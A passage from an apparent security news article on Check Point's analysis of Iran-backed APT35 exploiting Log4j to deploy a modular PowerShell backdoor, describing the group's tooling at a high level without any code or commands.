Iran-backed hacking group Phosphorous or APT35 is using the Log4j vulnerability to distribute a new modular PowerShell toolkit, according to security firm Check Point.
APT35 is one of several state-backed hacking groups known to have been developing tools to exploit public-facing Java applications that use vulnerable versions of the Log4j error-logging component.
Microsoft, which tracks the group as Phosphorous and has called it out for increasingly using ransomware in attacks, found it had operationalized a Log4j exploit for future campaigns less than a week after Log4Shell’s December 9 disclosure.
According to a further analysis by Check Point, APT35’s Log4j work was sloppy and “obviously rushed”, using a basic publicly available JNDI exploit kit (now removed from GitHub) for attacks that were easy to detect and attribute.
After exploiting Log4j on public-facing systems, the group uses what Check Point describes it as ‘a PowerShell-based modular backdoor’ for persistence, communication with a command and control (C&C) server, and command execution for additional modules.
The main module of the attacker’s PowerShell framework validates network connections, enumerates characteristics about a compromised system, retrieves the C&C domain from